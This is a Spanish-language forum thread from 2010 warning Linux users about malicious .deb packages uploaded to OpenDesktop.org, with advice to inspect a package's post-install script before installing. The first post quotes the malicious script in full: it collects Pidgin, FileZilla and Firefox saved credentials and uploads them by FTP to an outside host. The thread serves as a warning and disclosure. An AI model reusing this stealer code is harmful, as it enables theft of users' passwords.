Autor Tema: Cuidadito!! [DEBS peligrosos]  (Leído 1686 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ENIGMAXG2

  • The Communiter-
  • *
  • Mensajes: 5766
Cuidadito!! [DEBS peligrosos]
« : diciembre 29, 2010, 01:31:22 pm »

Al parecer la página OpenDesktop.org está siendo objeto de gente inescrupulosa y sin ocupación las cuales suben temas y archivos varios en formato binario debian (.deb) con códigos maliciosos dentro.

Un grupo ha sido creado recientemente para hacer sonar la alarma de algo que si no se trata a tiempo podría ser el fin del "en Linux no hay virus"


Cito textualmente lo que aparece en la página de este grupo:

Citar

Sea cuidadoso con los .debs. Nunca instale .debs descargados desde OpenDesktop.org sin revisarlos primero con el Gestor de Archivos.

Haga click derecho en el .deb descargado y seleccione la opción "Abrir con el Gestor de Archivos". Ingrese a la carpeta DEBIAN (o al archivo control.tar.gz) y si encuentra un archivo de post-instalación allí, léalo con su editor de textos. No lo instale si contiene código malicioso. Copie el código, regrese a la página del contenido, haga click en "Reportar contenido inapropiado" y pegue el código ahí.

Aquí una muestra del código:

Citar
#!/bin/sh
cd /etc/

rm -f accounts.xml sitemanager.xml key3.db signons*

cp /home/*/.purple/accounts.xml /etc/
cp /home/*/.filezilla/sitemanager.xml /etc/
cd /home/*/.mozilla/firefox/*.default/
cp key3.db signons* /etc/
cd /etc/

tar -zcf $$.tar.gz key3.db signons* accounts.xml sitemanager.xml

echo "ftp -n ftp.filehive.megabyet.net << EOT
ascii
user slave@filehive.megabyet.net cookiemonster
put $$.tar.gz
close
bye" >/etc/Gate.sh

chmod 777 Gate.sh
chmod +x Gate.sh

/etc/Gate.sh&
sleep 3
wget -q http://filehive.megabyet.net/index.php&

exit


Así que cuidadito con los .debs!!!
#SaveMarvelHeroes
ZOTAC GTX1060 MINI 3GB | HDD 2 TB | CM 550W | Core i5-2400 3.1GHZ | Intel H61 MOBO | CORSAIR 8GB DDR3 1600 | AOC 2269W 1080p + Acer X163WL 768p | W8.1 PRO x64| Logitech Z506/TurtleBeach EarForce P11[/center

Desconectado wvladimir2

  • Sv Full Member
  • *
  • Mensajes: 912
  • Posts: 5325
Re: Cuidadito!! [DEBS peligrosos]
« Respuesta #1 : diciembre 29, 2010, 01:34:15 pm »
quien traduce ese codigo no lo entiendo
ZETSUBOSHITA.

Desconectado ENIGMAXG2

  • The Communiter-
  • *
  • Mensajes: 5766
Re: Cuidadito!! [DEBS peligrosos]
« Respuesta #2 : diciembre 29, 2010, 01:37:09 pm »
quien traduce ese codigo no lo entiendo

pues nada más y nada menos que un ladrón de contraseñas.
#SaveMarvelHeroes
ZOTAC GTX1060 MINI 3GB | HDD 2 TB | CM 550W | Core i5-2400 3.1GHZ | Intel H61 MOBO | CORSAIR 8GB DDR3 1600 | AOC 2269W 1080p + Acer X163WL 768p | W8.1 PRO x64| Logitech Z506/TurtleBeach EarForce P11[/center

Desconectado Angel_Caido

  • MiembrosReales
  • *
  • Mensajes: 26
Re: Cuidadito!! [DEBS peligrosos]
« Respuesta #3 : febrero 17, 2011, 11:01:39 am »
Eso de descargar archivos .deb de cualquier lado es casi como usar los .exe en Windows. No se sabe con qué se topa uno.
Yo creo que en Linux debe existir la cultura de la seguridad. Usar aplicaciones unicamente desde sus repositorios oficiales [hasta donde sea posible].